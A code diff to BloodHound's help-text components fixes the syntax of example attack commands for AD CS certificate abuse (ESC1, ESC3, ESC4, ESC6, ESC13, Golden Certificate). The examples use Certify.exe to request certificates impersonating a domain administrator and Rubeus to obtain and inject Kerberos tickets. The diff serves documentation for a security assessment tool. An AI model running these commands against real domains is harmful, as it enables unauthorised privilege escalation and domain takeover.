diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx
index bc63fbbae..0c5554f51 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx
@@ -27,7 +27,7 @@ const WindowsAbuse: FC = () => {
{
- 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestroot\\ForestRootDA'
+ 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestrootda /sidextension:S-1-5-21-2697957641-2271029196-387917394-500'
}
Save the certificate as cert.pem and the private key as cert.key.
@@ -44,7 +44,7 @@ const WindowsAbuse: FC = () => {
target identity to impersonate and the PFX-formatted certificate created in Step 2:
- {'Rubeus asktgt /user:"forestroot\\forestrootda" /certificate:cert.pfx /password:asdf /ptt'}
+ {'Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
Step 5: Optionally verify the TGT by listing it with the klist command:
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx
index 17f002f7c..d4057b9b9 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx
@@ -53,7 +53,7 @@ const WindowsAbuse: FC = () => {
attacker identity, the PFX-formatted certificate created in Step 2, and the certificate password:
- {'Rubeus asktgt /user:"forestroot\\attacker" /certificate:cert.pfx /password:asdf /ptt'}
+ {'Rubeus asktgt /user:attacker /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
Step 5: Optionally verify the TGT by listing it with the klist command:
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx
index e6bd09040..4e6d82ac4 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx
@@ -87,7 +87,7 @@ const WindowsAbuse: FC = () => {
impersonate and the PFX-formatted certificate created in Step 4.
- {'Rubeus.exe asktgt /user:CORP\\itadmin /certificate:itadminenrollment.pfx'}
+ {'Rubeus.exe asktgt /user:itadmin /domain:corp.local /certificate:itadminenrollment.pfx'}
>
);
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx
index 315bfd65c..7d25367bf 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx
@@ -592,7 +592,7 @@ const WindowsAbuse: FC = () => {
{
- 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestroot\\ForestRootDA'
+ 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestrootda /sidextension:S-1-5-21-2697957641-2271029196-387917394-500'
}
Save the certificate as cert.pem and the private key as cert.key.
@@ -623,7 +623,7 @@ const WindowsAbuse: FC = () => {
target identity to impersonate and the PFX-formatted certificate created in Step 7:
- {'Rubeus asktgt /user:"forestroot\\forestrootda" /certificate:cert.pfx /password:asdf /ptt'}
+ {'Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
>
);
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx
index 296249a25..2040cf894 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx
@@ -27,7 +27,7 @@ const WindowsAbuse: FC = () => {
{
- '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA'
+ '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestrootda'
}
@@ -48,7 +48,9 @@ const WindowsAbuse: FC = () => {
target identity to impersonate and the PFX-formatted certificate created in Step 2:
- {'.\\Rubeus.exe asktgt /certificate:cert.pfx /user:”forestroot\\forestrootda” /password:asdf /ptt'}
+ {
+ '.\\Rubeus.exe asktgt /certificate:cert.pfx /user:forestrootda /domain:forestroot.com /password:asdf /ptt'
+ }
Step 4: Optionally verify the TGT by listing it with the klist command:
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx
index 0d81e85a1..b371f97ec 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx
@@ -30,7 +30,7 @@ const WindowsAbuse: FC = () => {
{
- '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA'
+ '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestrootda'
}
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
index 83cf5fa68..9c0e5e900 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
@@ -60,7 +60,9 @@ const Abuse: FC = () => {
2) Request a TGT for the targeted principal using the certificate with Rubeus:
- {'Rubeus.exe asktgt /user:Roshi /certificate:target.pfx /password:NewPassword123!'}
+ {
+ 'Rubeus.exe asktgt /user:Roshi /domain:dumpster.fire /certificate:target.pfx /password:NewPassword123!'
+ }
>